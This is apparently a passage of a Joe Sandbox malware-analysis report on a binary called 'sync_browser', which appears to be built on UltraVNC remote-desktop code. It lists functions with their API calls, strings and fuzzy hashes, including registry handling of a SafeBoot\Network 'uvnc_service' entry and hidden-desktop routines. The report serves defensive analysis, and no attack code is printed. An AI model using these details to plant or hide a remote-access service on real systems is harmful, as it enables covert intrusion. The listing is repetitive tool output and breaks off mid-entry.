Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfileWrite$SectionStringwsprintf
String ID: Permissions$isWritable
API String ID: 4007284473-46173998
Opcode ID: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
Instruction ID: 56d47585085f54f49572802057b599b8885a67ba7a9871cc7cdaf7798d3a28aa
Opcode Fuzzy Hash: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
Instruction Fuzzy Hash: 15017161A0965793FA14AB25F4519A9B720FFD9F98FC42033DD0E0B254EF2CE149C760

Function 00007FF7D5943760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 23registryCOMMON

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 00007FF7D594379D

Part of subcall function 00007FF7D59E851C: _errno.LIBCMT ref: 00007FF7D59E8553
Part of subcall function 00007FF7D59E851C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E855E

RegDeleteKeyA.ADVAPI32 ref: 00007FF7D59437AE

Strings

SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s, xrefs: 00007FF7D5943787
uvnc_service, xrefs: 00007FF7D5943779
Network, xrefs: 00007FF7D5943780

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Delete_errno_invalid_parameter_noinfo_snprintf
String ID: Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$uvnc_service
API String ID: 1597899911-1199838351
Opcode ID: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
Instruction ID: ff018f53b2cac96dd97796f96d13ad8c399ba82bb52951ad6f429678fd7ef136
Opcode Fuzzy Hash: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
Instruction Fuzzy Hash: 57F09661629A4282EA14A720F4517AEA750FF84748FC01137EA4D43798CF3CD105C764

Function 00007FF7D59E929C Relevance: 7.7, APIs: 5, Instructions: 187COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF7D59E9274

Part of subcall function 00007FF7D59F3848: _amsg_exit.LIBCMT ref: 00007FF7D59F385E

_errno.LIBCMT ref: 00007FF7D59F7168
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59F7173

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _amsg_exit_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 1050512615-0
Opcode ID: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
Instruction ID: 44c3be7619f27613c89d2768f7e53e1554c08f0207b452a1ac8836d1b222afbc
Opcode Fuzzy Hash: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
Instruction Fuzzy Hash: C971B012E0C2D257FB616B7195501BCABA4AB01F8CFD89473FE990669ACF3CE851C321

Function 00007FF7D59F5D3C Relevance: 7.6, APIs: 5, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,00000010,00000008,?,00007FF7D59F5EF7), ref: 00007FF7D59F5D96
malloc.LIBCMT ref: 00007FF7D59F5DFA
MultiByteToWideChar.KERNEL32(?,?,?,?,00000010,00000008,?,00007FF7D59F5EF7), ref: 00007FF7D59F5E42
GetStringTypeW.KERNEL32(?,?,?,?,00000010,00000008,?,00007FF7D59F5EF7), ref: 00007FF7D59F5E59
free.LIBCMT ref: 00007FF7D59F5E6D

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$StringTypefreemalloc
String ID:
API String ID: 307345228-0
Opcode ID: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
Instruction ID: 1f4e0202271c4cbc88bb45f763dde2f7bee5b054a97c4f05e827ee556a3c889c
Opcode Fuzzy Hash: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
Instruction Fuzzy Hash: 8E418432A196419BEB24AF2598005ADA7D5FF44FB8FD84232EE2D477D5DF38D4018310

Function 00007FF7D59E7A88 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,00000000,00007FF7D59E7B9D,?,?,?,?,00007FF7D59E79F3), ref: 00007FF7D59E7AB1
DecodePointer.KERNEL32(?,?,00000000,00007FF7D59E7B9D,?,?,?,?,00007FF7D59E79F3), ref: 00007FF7D59E7AC1

Part of subcall function 00007FF7D59F3480: _errno.LIBCMT ref: 00007FF7D59F3489
Part of subcall function 00007FF7D59F3480: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59F3494

EncodePointer.KERNEL32(?,?,00000000,00007FF7D59E7B9D,?,?,?,?,00007FF7D59E79F3), ref: 00007FF7D59E7B3F

Part of subcall function 00007FF7D59F3370: realloc.LIBCMT ref: 00007FF7D59F339B
Part of subcall function 00007FF7D59F3370: Sleep.KERNEL32(?,?,00000000,00007FF7D59E7B2F,?,?,00000000,00007FF7D59E7B9D,?,?,?,?,00007FF7D59E79F3), ref: 00007FF7D59F33B7

EncodePointer.KERNEL32(?,?,00000000,00007FF7D59E7B9D,?,?,?,?,00007FF7D59E79F3), ref: 00007FF7D59E7B4F
EncodePointer.KERNEL32(?,?,00000000,00007FF7D59E7B9D,?,?,?,?,00007FF7D59E79F3), ref: 00007FF7D59E7B5C

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
String ID:
API String ID: 1909145217-0
Opcode ID: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
Instruction ID: eb2f4d71012a0cccb6f3fd90c8c0b4e06328900e4a67e19d53bf89ea7b8762df
Opcode Fuzzy Hash: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
Instruction Fuzzy Hash: C2217120B0E65242EA04BB22E95446DE665BF84FC4BC84437DD0D4775AEF7CE485C320

Function 00007FF7D595DAF0 Relevance: 7.6, APIs: 5, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32 ref: 00007FF7D595DB25
FreeLibrary.KERNEL32 ref: 00007FF7D595DB3F
FreeLibrary.KERNEL32 ref: 00007FF7D595DB58
DeleteCriticalSection.KERNEL32 ref: 00007FF7D595DB7E
DeleteCriticalSection.KERNEL32 ref: 00007FF7D595DB8C

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalDeleteSection$FreeLibrary
String ID:
API String ID: 3328731263-0
Opcode ID: 8efbe1f9ef3851a4ff4b1dc12ed94241d7363f7543c6192012ec118bd10c3970
Instruction ID: 3e5c153d615e57d3762970578d0048bf4581b9ce81ac6605242aa8a559e44730
Opcode Fuzzy Hash: 8efbe1f9ef3851a4ff4b1dc12ed94241d7363f7543c6192012ec118bd10c3970
Instruction Fuzzy Hash: FB213D21719B81A7EA48EB24D5A06FCA364FF81B54FC40132DAAD032A1DF3CA1A5C321

Function 00007FF7D59FA62C Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7D59FA663
GetCurrentProcessId.KERNEL32 ref: 00007FF7D59FA66E
GetCurrentThreadId.KERNEL32 ref: 00007FF7D59FA67A
GetTickCount.KERNEL32 ref: 00007FF7D59FA686
QueryPerformanceCounter.KERNEL32 ref: 00007FF7D59FA697

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
Instruction ID: 6e5b5d49f4b05e1f88b68d6e3857f1f79de6cac985d819f85a7cf0202ba1c6dd
Opcode Fuzzy Hash: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
Instruction Fuzzy Hash: 3C01A122A28A1587F740AF25E844669EB60FF88F94FC46532EE5E077A4CF3CD8948310

Function 00007FF7D5947A30 Relevance: 7.5, APIs: 5, Instructions: 32COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,?,00007FF7D59476B4), ref: 00007FF7D5947A4B
SetEvent.KERNEL32(?,?,?,00007FF7D59476B4), ref: 00007FF7D5947A55
SetEvent.KERNEL32(?,?,?,00007FF7D59476B4), ref: 00007FF7D5947A5F
InitializeCriticalSection.KERNEL32(?,?,?,00007FF7D59476B4), ref: 00007FF7D5947A8B
InitializeCriticalSection.KERNEL32(?,?,?,00007FF7D59476B4), ref: 00007FF7D5947A95

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Event$CriticalInitializeSection
String ID:
API String ID: 4164307405-0
Opcode ID: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
Instruction ID: 118d92c705d9d7e49218004396e2cfb9d042a02da08c51fe1e864d33e1e74e32
Opcode Fuzzy Hash: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
Instruction Fuzzy Hash: F6010272514B01C6D7049F39E9804ACB7B8FF98F98B904126CE8D57768CF39C4A5C360

Function 00007FF7D59EB6F0 Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF7D59EB6F9
_errno.LIBCMT ref: 00007FF7D59EB701

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
Instruction ID: 417f03cd45b5913dfd67ad2e7a143cbc6f2b204b3c7732779aaadc3781d97e70
Opcode Fuzzy Hash: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
Instruction Fuzzy Hash: DE014BA2E0E64647EA053B54885137CAA529FA1F6AFD64733DD2D06BD2CB7D65408330

Function 00007FF7D5953220 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

gethostbyname.WS2_32 ref: 00007FF7D595323C
sprintf.LIBCMT ref: 00007FF7D59532C9

Strings

%d., xrefs: 00007FF7D59532B4
IP address unavailable, xrefs: 00007FF7D595324A

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: gethostbynamesprintf
String ID: %d.$IP address unavailable
API String ID: 4032199589-2983120142
Opcode ID: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
Instruction ID: 9a26384c3dde9a3b58c9eb731fed319f16ddc628051b4bf97e4c4404efd958ed
Opcode Fuzzy Hash: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
Instruction Fuzzy Hash: FA419121618A8582D620EB25A84056EFBA0FB84FE4FC45732EEAE43BD5DF3CD1518710

Function 00007FF7D59608E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

LoadCursorA.USER32 ref: 00007FF7D5960925

Part of subcall function 00007FF7D59E7978: malloc.LIBCMT ref: 00007FF7D59E7992

Part of subcall function 00007FF7D595D930: InitializeCriticalSection.KERNEL32 ref: 00007FF7D595D95E
Part of subcall function 00007FF7D595D930: InitializeCriticalSection.KERNEL32 ref: 00007FF7D595D9EB
Part of subcall function 00007FF7D595D930: LoadLibraryA.KERNEL32 ref: 00007FF7D595DA0D
Part of subcall function 00007FF7D595D930: GetProcAddress.KERNEL32 ref: 00007FF7D595DA30
Part of subcall function 00007FF7D595D930: LoadLibraryA.KERNEL32 ref: 00007FF7D595DA51
Part of subcall function 00007FF7D595D930: GetProcAddress.KERNEL32 ref: 00007FF7D595DA6D

Strings

vncdesktop.cpp : initialising desktop handler, xrefs: 00007FF7D59608FF
vncDesktopSW.cpp : SWinit , xrefs: 00007FF7D59609AF
vncdesktop.cpp : failed to start hook thread, xrefs: 00007FF7D5960972

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Load$AddressCriticalInitializeLibraryProcSection$Cursormalloc
String ID: vncDesktopSW.cpp : SWinit $vncdesktop.cpp : failed to start hook thread$vncdesktop.cpp : initialising desktop handler
API String ID: 2513085289-3031267129
Opcode ID: e487d388fed18aea2260250da6f24d23774b770b27bbd1d7d67b117f7b2f2a02
Instruction ID: d551aa61ba1dc28884990a338c7d1ea296685cb4bd7232bd5e1545b22ae975ab
Opcode Fuzzy Hash: e487d388fed18aea2260250da6f24d23774b770b27bbd1d7d67b117f7b2f2a02
Instruction Fuzzy Hash: 11215931A18B9193F608AB60E5405ADE3A4FB84B90FC44636DAAD57795DF3CA065C360

Function 00007FF7D599A130 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF7D599A183

Strings

Default, xrefs: 00007FF7D599A1CC

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: DesktopInputOpen
String ID: Default
API String ID: 601053899-753088835
Opcode ID: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
Instruction ID: ebec03262f71ea4947327a19df33c7610e03fc61667fd7fd3b189eb9354a5e42
Opcode Fuzzy Hash: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
Instruction Fuzzy Hash: 03219F35A1D6C283EA34AB21B4117AEA7A4FB89B88FC41032DE8D43788CF3DD014CB10

Function 00007FF7D593A830 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32 ref: 00007FF7D593A88F
GetLastError.KERNEL32 ref: 00007FF7D593A899

Strings

HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x), xrefs: 00007FF7D593A89F
HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x, xrefs: 00007FF7D593A8B0

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
